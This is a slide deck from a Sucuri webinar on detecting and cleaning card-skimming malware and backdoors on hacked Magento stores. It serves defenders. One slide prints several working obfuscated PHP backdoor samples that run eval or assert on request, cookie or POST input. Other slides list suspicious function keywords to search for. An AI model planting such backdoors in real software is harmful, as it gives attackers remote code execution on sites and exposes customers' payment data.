Upload
sucuri
View
216
Download
0
Embed Size (px)
Citation preview
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
VALENTIN VESABrand Evangelist - Moderator@adspedia
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
HOUSEKEEPING ITEMS
● We want to hear from you
● Question tab in GoToWebinar
● Tweet @SucuriSecurity using #AskSucuri
● Questions will be answered at the end
● All questions will receive a response
● Video and slides coming in a few days
● Please share this content with other website owners
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
CESAR ANJOSSecurity Analyst / Incident Responder at Sucuri
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Porto, Portugal
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
What to expect from this webinar
● Understanding if there may have been some compromise
● How to assess if there may be any credit card stealers on the site
● How to look for the most common types of credit card stealers
● How to get rid of most infections without actually having much
technical knowledge
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
sucuri.net/guides
Step-by-step walkthroughs
for popular CMS platforms
and website security issues.
Get Instructions
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Data stealer malware
● Biggest enemy of Magento
installations.
● Confirmation of a breach may
require cooperation with authorities.
● Advisable to alert customers as they
may have not (yet) been affected
by it.
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Overview
● Looking for signs of compromise
● Finding the malware
● Clean the infection and wipe its remains
● What Now?
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Understanding Data breach implications
If any compromise happens, be sure to make a full backup of:
•Server log files
•All files pertaining the site
•Database
Having a data breach on your website affects the website, its owner, and its users.
The website owner has the responsibility to investigate any suspicion of compromise and keep record of all
findings.
Any data stolen by the attackers is usually used within the first 12hrs (post-theft). In some cases, it may also
be kept for later use, or sold.
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
LOOKING FOR SIGNS OF COMPROMISEWhat are some of the indicators that your website has been compromised?
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Indicators of compromise:
● Customers reporting strange behavior on your site
● Checkout process acting oddly
● Customers complaining that their data was stolen after buying on your website
● External scanners detecting some malware or blacklist
● Unauthorized acesses or changes
● You just spot something strange, such as a defacement
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Dialog with customers
● Data being stolen
● Redirects
● Pop-ups
● Alert messages
● When exactly did the visit and theft occur
● What browser/Antivirus/OS/platform
● Were any purchases done on other websites
● Detailed explanation of what happened
What they report What you need to verify
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Abnormal checkout behavior
● Redirects
● Pop-ups
● Strange files being loaded on the page
● Payments going to someone else’s account
● Just doesn’t work
Ensuring that the entire flow keeps its integrity is very important.
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Using a Virtual Credit Card
● Virtual Credit cards have spending limit and usually very short expiration date
● Most banks across the world offer such service
● Low risk if stolen
● Can use pre-paid or debit system
● No direct relation between the card and your Identity
● May have a per card cost, usually 1$.
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Scan your site
● Sucuri Sitecheck - sitecheck.sucuri.net
● Hypernode’s Magereport - magereport.com
● Magescan - magescan.com
● Google’s Virustotal - virustotal.com
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Sitecheck
● Checks for blacklists
● Scans for multiple kinds of malware within the site
● Provides immediate insight on what was detected
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Magereport
● Checks for missing patches
or vulnerable elements
● Check for certain specific
malware types that affect
Magento environments
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Virustotal
Checks for blacklists on multiple providers
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Blacklist
Google’s blacklist is the most damaging blacklist.
Blacklisted websites lose about 95%
of traffic
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Modus Operandi of credit card swipers
● Typically Javascript
● Can work based on current page e.g.
“firecheckout”
● Can be present on PHP files that directly
handle checkouts
● Gets cached easily by Magento
● Typically stored inside /media
● Usually disguises itself as an image or a
file with no extension
● File size grows over 3Mb’s extremely fast
● Can only be inside PHP files
Sends the data to an external domain Stores the Data on your domain’s files
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
FINDING THE MALWAREHow can the malware be located?
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Focused analysis
● Needle in a haystack
● Start by focusing on what you already know
● Attempting to establish a timeframe is important in data theft cases
● Look for what else may be present
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Check modified files
● Using Diff command to compare with a clean version
● Checking for files modified within the last few days if you suspect the
compromise was recent
● Try Amasty’s Free Modified Core files reporting tool
https://blog.amasty.com/freebie-magento-modified-core-files-report-by-amasty
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Diff command
● $ mkdir magento-2.1.3
● $ cd magento-2.1.3
● $ wgetgithub.com/magento/magento2/archive/2.1.3.tar.gz
● $ tar -zxvf 2.1.3.tar.gz
● $ diff -r 2.1.3 ./public_html
● Has to be run through SSH.
● Useful to get a direct comparison of what is different
between 2 sets of folders.
● If comparison is done with a freshly downloaded
installation any modules that have been installed by
the owner have to be compared separately.
● Can also be used to compare current live version with a backup to get a direct result of what is different.
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Files modified recently
● $ find ./ -type f -mtime -15Tells what files were modified in the last 15 days
● $ find ./ -type f -mtime -30Tells what files were modified in the last 30 days
● This gives a clear indication of what files have been
modified in the timeframe specified.
● If you have a clear date of when the compromise
might have happened, this is a great starting point.
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Pro Tip - Check your modified files
● Look for files bigger than 3Mb’s as they may store customers stolen data
$find . -type f -size +3M
● Use Sucuri’s Backup service as an Integrity Records keeper
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Audit users list
● Any unfamiliar users must be removed
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Functions/code most used by malware that steals credit card info/logins
Search for common swiper functions/code
● <script (with inclusion of an external file)
● http.open
● http.send
● this[“eval”]
● fwrite
● file_put_contents
● FILE_APPEND
● mail(
● Curl
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Example swipers on app/code/core/Mage/Checkout/controllers/OnepageController.php
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Search for common backdoor functions/code
● assert
● stripslashes
● preg_replace (with /e/)
● move_uploaded_file
● strrev
● file_get_contents
● encodeURI
● strtr
● base64
● str_rot13
● gzuncompress
● gzinflate
● curl_exec
● exec
● create_function
● wget
● system
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Common backdoors
<?php if/*pzC*/(isset($_REQUEST['gTOM']))/*A*/{/*h*/$1=/*B*/"assert";$G=$1/*HJ*/(/*jyM*/$_REQUEST\['gTOM'])/*tC*/;exit;}?>
<?php /*k*/if(!function_exists('_BmHCiKnI')){$GLOBALS['_CbuEzptH_']=Array('' .'preg_repla' .'ce'); @function
_BmHCiKnI($i){$a=Array('jQzN','/(.*)/e','jQzN','');return $a[$i];}if(@isset($_REQUEST[_BmHCiKnI(0)])){
@$GLOBALS['_CbuEzptH_'][0](_BmHCiKnI(1),$_REQUEST[_BmHCiKnI(2)],_BmHCiKnI(3));exit;}}
<?php if(isset($_COOKIE["lI"])){$_COOKIE["ud"]($_COOKIE["lI"]);exit;}
<?php function echo2($token){ @eval($token);}echo2($_POST[libsodium]);?>
if(md5($_COOKIE['key']) == $key) { eval (base64_decode($_POST["code"])); }
${"QK"}=@$ {"_POST"/*cdtxd6*/};@((($QK{ "0"}/*vgx94*/<>@$QK{"1"})))?@ $QK{"2" }(( (/*nkp*/@${"QK"}{"3"}))):${'QK'
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Check your site’s header and footer areas
Footer and header areas are a prime target for attackers because they load
throughout the site
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Check with an outside expert
Consult directly with security experts when in doubt, or just require assistance.
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
CLEAN THE INFECTION AND WIPE ITS REMAINSHow to effectively get rid of Magento’s most common infections
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Before you attempt to fix anything
● Ensure that you have performed a full backup of files and database
● Store them in a safe location
● Preferably import your website on a temporary environment
● Place your website in maintenance mode, if required
● Contact authorities if you are a big store and there was any data theft
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Fix hacked files
● Search the files for any malware indication you may have obtained
● Inspect the modified files that were discovered by the investigation
● Restore those files to a known integral legitimate state from official sources
● Googling parts of suspicious code may help with cleanup
● Remove any suspicious code
● Test the site to ensure everything still works as it should
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Suspicious code
● Sometimes code may look suspicious because it is encoded,
but many modules have the code encoded to prevent being
stolen.
● The modules must be individually compared with their
original version.
● Some online tools that help decode remaining code.● ddecode.com/phpdecoder
● unphp.net/
● jsbeautifier.org/
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Using ddecode.com
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Using unphp.com
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Database infections
● Ensure that you have a full backup before any operation.
● They can usually be cleaned directly through the backend of
the site
● Attackers usually infect the core_config_data table, more
specifically, the records design/head/includes and design/footer/absolute_footer
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Tidying up
● Reset user passwords
● Change cPanel or FTP/SFTP credentials
● Review who has access to what
● Clear caches (very important step)
● Fix any malware warnings or blacklists
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
All CLEAN, WHAT NOW?
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Steps to take
● Ensure all security patches are applied
● Have a backup system in place
● Scan computers that access the backend
● Add extra control/protection mechanisms to the site
● Take every precaution to ensure that all vulnerable areas are secure or
patched, such as /downloader
● Change backend admin area URL
● Make regular purchases on your own site to ensure its integrity (using virtual Credit Cards)
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Useful extensions/services to have in place
● Sucuri Firewall
● MageFirewall Security
● Nexcess Sentry Two-Factor Authentication
● miniOrange Two-Factor Authentication
● Admin Actions Log extension (if there are various admin users)
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
You have to assume the attackers will be back
● Keep all accesses filtered and monitored
● Keep up with security updates
● Prepare an incident response plan with your team -https://github.com/talesh/response
● Ensure that the backup system works when needed; test by restoring
it on a separate location and verify that it works
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Website Firewall
How to CLEAN a Hacked Magento SiteWEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
WEBINAR
Cesar Anjos | @sucurisecurity #AskSucuri
Tweet us any time with your questions @SucuriSecurity using #AskSucuri
THANK YOUTime for Questions